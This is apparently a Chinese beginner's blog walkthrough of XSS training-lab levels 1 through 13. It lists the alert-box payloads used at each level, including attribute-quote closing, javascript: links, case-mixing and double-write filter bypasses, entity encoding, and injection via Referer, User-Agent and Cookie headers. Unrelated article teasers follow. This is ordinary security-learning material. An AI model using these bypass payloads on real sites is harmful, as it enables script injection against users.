【新手小白的xsslab靶场学习】

第1关

最开始页面源代码
在这里插入图片描述
直接输入<script>alert(1)</script>
在这里插入图片描述

第2关

页面源代码
在这里插入图片描述
先尝试<script>alert(1)</script>看页面源代码
在这里插入图片描述
<h2>里面尖括号被编码,<input>里面没有编码,直接双引号闭合,
修改payload,输入" onclick=alert('xss') type="
在这里插入图片描述

第3关

页面源码里面没有和这个参数有关系的。
在这里插入图片描述
在搜索框搜索,找到新参数
在这里插入图片描述
在这里插入图片描述
直接闭合" οnclick=alert(‘xss’) type="
在这里插入图片描述
双引号被编码,仔细观察看value后面是单引号,把payload里面的双引号换成单引号,’ οnclick=alert(‘xss’) type=’
在这里插入图片描述

第4关

页面源码相关位置
在这里插入图片描述
直接闭合,输入" οnclick=alert(‘xss’) type="
成功
在这里插入图片描述

第5关

页面源码
在这里插入图片描述
直接输入闭合" οnclick=alert(‘xss’) type="
在这里插入图片描述
发现过滤了onclick,随后又尝试onmouseover,onload,onfocus,onclick,onerror,都被过滤了。换一种想法,直接闭合input标签,输入"> <a href="javascript:alert('xss')">aa</a>
成功
在这里插入图片描述

第6关

页面源码
在这里插入图片描述
输入上一关的payload,"> <a href="javascript:alert('xss')">aa</a>发现href被过滤
在这里插入图片描述
又尝试了href,src,script,onmouseover,onload,onfocus,onclick,action,onerror
都被过滤了,
后面搜索了一下绕过方法,直接大小写绕过,先从href开始
"> <a hREf="javascript:alert('xss')">aa</a>
成功
在这里插入图片描述

第7关

页面源码
在这里插入图片描述
直接输入上面"> <a hREf="javascript:alert('xss')">aa</a>
的payload,发现javascript被替换成java,href被替换成空
在这里插入图片描述
直接双写"> <a hREhREff="javascripscriptt:alert('xss')">aa</a>
成功
在这里插入图片描述

第8关

页面源码
在这里插入图片描述
发现在输入1111添加友情链接,在点击友情链接,直接跳转
在这里插入图片描述
查看源码
在这里插入图片描述
直接javascript:alert(‘xss’)
javascript被过滤,双写也不能绕过
在这里插入图片描述
然后尝试对javascript:alert(‘xss’)进行编码,点击链接直接弹框

&#106;&#97;&#118;&#97;&#115;&#99;&#82;&#105;&#80;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;

成功
在这里插入图片描述

第9关

输入和上一关一样的payload之后,发现点击会直接跳转,
在这里插入图片描述
链接不合法,
重新输入http://之后,发现不会跳转
尝试几次之后,发现输入框必须要输入http://才不会跳转到错误页面,
然后尝试对javascript:alert(‘xss’) 进行html编码后,加入http:// ,没有任何反应,应该是http://影响了语句,然后搜索js里面注释标签是/**/
再此输入

&#106;&#97;&#118;&#97;&#115;&#99;&#82;&#105;&#80;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41; /*http://*/

成功
在这里插入图片描述

第10关

页面源码
在这里插入图片描述
观察发现没有其他地方有回显的内容,尝试这个地方基本都过滤了一些标签。
又观察到后面有3个input框是隐藏的。
input表单提交:当用户填写表单并提交时,name属性指定的字段名称将与该字段的值一起作为键值对传递到服务器端。服务器端可以通过这个名称来获取对应字段的值,以便处理用户提交的数据

在url后面加上参数,经过尝试只有t_sort参数才会回显到前端
在这里插入图片描述
双引号闭合,再取消input框隐藏,输入

22" onclick=alert('xss') type="

成功
在这里插入图片描述

第11关

在这里插入图片描述
和第10关一样,这个回显位置不能作为注入点。
尝试form里面input框的其他参数,t_sort也不可以回显了。
参数后加入t_ref,也不会回显
在这里插入图片描述
查看请求包,发现请求包里面没有Referer,
通过hackbar构造一下referer
在这里插入图片描述
在这里插入图片描述
请求头里面的referer修改才会回显到页面源码上,修改referer为
" οnclick=alert(‘xss’) type="
在这里插入图片描述
成功
在这里插入图片描述

第12关

页面源码
在这里插入图片描述
和第11关大差不差,尝试后url后面加参数无法回显到页面上,
但是t_ua后面的value值明显是请求头里面user_agent的内容。
直接" οnclick=alert(‘xss’) type="
在这里插入图片描述
成功
在这里插入图片描述

第13关

页面源码
在这里插入图片描述
第13关页面源码看完,应该是修改cookie,回显到t_cook里面。
尝试直接写2222,不行。
在这里插入图片描述
后面查询资料cookie是key=value结构组成,前面得加字段
cookie:user=value=222
在这里插入图片描述
回显
在这里插入图片描述
输入user=22222" οnclick=alert(‘xss’) type="
成功
在这里插入图片描述
后面的几关,本菜鸡不太会,也没看懂

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/315320.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PostgreSQL数据库的json操作

PostgreSQL数据库的json操作

1.操作符 select json字段::json->key值 from order -- 对象域 select json字段::json->>key值 from order -- 文本 select json字段::json#>{key值} from order -- 对象域 select json字段::json#>>{key值} from order -- 文本对象域表示还能继续操作&#…
阅读更多...
test ui-04-testcomplete 入门介绍

test ui-04-testcomplete 入门介绍

About TestComplete TestComplete是一款适用于各种应用程序类型和技术的自动化测试环境&#xff0c;包括&#xff08;但不限于&#xff09;Windows、.NET、WPF、Visual C、Visual Basic、Delphi、CBuilder、Java以及Web应用程序和服务。 TestComplete既适用于功能测试&#x…
阅读更多...
Premiere分屏特效图文内容幻灯片展示视频素材PR模板下载

Premiere分屏特效图文内容幻灯片展示视频素材PR模板下载

Premiere Pro 模板&#xff0c;多屏幕内容展示PR幻灯片模板&#xff0c;分屏特效图文视频素材pr模板下载。 这是一个高质量、组织良好且易于自定义的视频剪辑模板。只需替换图像或视频&#xff0c;编辑文本&#xff0c;添加音频&#xff0c;微微调整即可&#xff01; 来自PR模板…
阅读更多...
【Unity中的A星寻路】Navigation导航寻路系统四大页签详解

【Unity中的A星寻路】Navigation导航寻路系统四大页签详解

&#x1f468;‍&#x1f4bb;个人主页&#xff1a;元宇宙-秩沅 &#x1f468;‍&#x1f4bb; hallo 欢迎 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! &#x1f468;‍&#x1f4bb; 本文由 秩沅 原创 &#x1f468;‍&#x1f4bb; 收录于专栏&#xff1a;Uni…
阅读更多...
找第三方数据公司获取电商平台商品数据订单数据店铺信息等

找第三方数据公司获取电商平台商品数据订单数据店铺信息等

API文档 如何获取&#xff1f; 应用业务场景&#xff08;不限&#xff09;
阅读更多...
关于Github部分下载的方法

关于Github部分下载的方法

一、问题 在Github中&#xff0c;我需要下载部分文件&#xff0c;而github只有下载最原始文件夹和单独文件的功能。 比如我想下载头四个文件&#xff0c;难以操作。 二、方法 推荐使用谷歌浏览器&#xff0c;进入扩展程序界面&#xff1a; 在应用商店获取GitZip for github…
阅读更多...
字符串 (5)--- 后缀数组(倍增思想求解)

字符串 (5)--- 后缀数组(倍增思想求解)

字符串下标从 1 开始。 字符串 s 的长度为 n。 " 后缀 i" 代指以第 i 个字符开头的后缀&#xff0c;存储时用 i 代表字符串 s 的后缀 s[i ... n]。 后缀数组&#xff08;Suffix Array&#xff09;主要关系到两个数组&#xff1a;sa 和 rk。 后缀数组sa&#xff0c;s…
阅读更多...
1213:八皇后问题 深度优先搜索算法

1213:八皇后问题 深度优先搜索算法

1213&#xff1a;八皇后问题 时间限制: 1000 ms 内存限制: 65536 KB 【题目描述】 在国际象棋棋盘上放置八个皇后&#xff0c;要求每两个皇后之间不能直接吃掉对方。 【输入】 (无) 【输出】 按给定顺序和格式输出所有八皇后问题的解&#xff08;见样例&#xff09;。 题目…
阅读更多...
009、引用

009、引用

1. 引用与借用 下面的示例重新定义了一个新的 calculate_length 函数。与之前不同的是&#xff0c;新的函数签名使用了 String 的引用作为参数而没有直接转移值的所有权&#xff1a; fn main() { let s1 String::from("hello"); let len calculate_length(&s1…
阅读更多...
Python实现的面部健康特征识别系统

Python实现的面部健康特征识别系统

Python实现的面部健康特征识别系统 引言1. 数据集获取与准备2. 模型训练3. Flask框架的应用4. 前台识别测试界面 结论与展望 引言 本文将介绍一个基于Python的面部健康特征判别系统&#xff0c;该系统利用互联网获取的公开数据集&#xff0c;分为健康、亚健康和不健康三个类别…
阅读更多...
从零开始配置pwn环境:CTF PWN 做题环境

从零开始配置pwn环境:CTF PWN 做题环境

前期在kali2023环境安装的pwndocker使用发现不好用&#xff0c;so找了网上配置好pwn环境的虚拟机。 GitHub - giantbranch/pwn-env-init: CTF PWN 做题环境一键搭建脚本 可以直接下载我配置好的Ubuntu 16.04&#xff0c;为VMware导出的ovf格式 链接&#xff1a;百度网盘 请输…
阅读更多...
Spring MVC - Controller的创建与使用

Spring MVC - Controller的创建与使用

控制器Controller是处理器&#xff0c;是真正处理请求的组件 1 创建Controller 一般在src/main/java/com/qdu下建立一个controller包用来存放所有控制器。当创建一个控制器时&#xff0c;首先要记得使用Controller标记将该类注册成为一个控制器类。 然后在SpringMVCConfig类…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023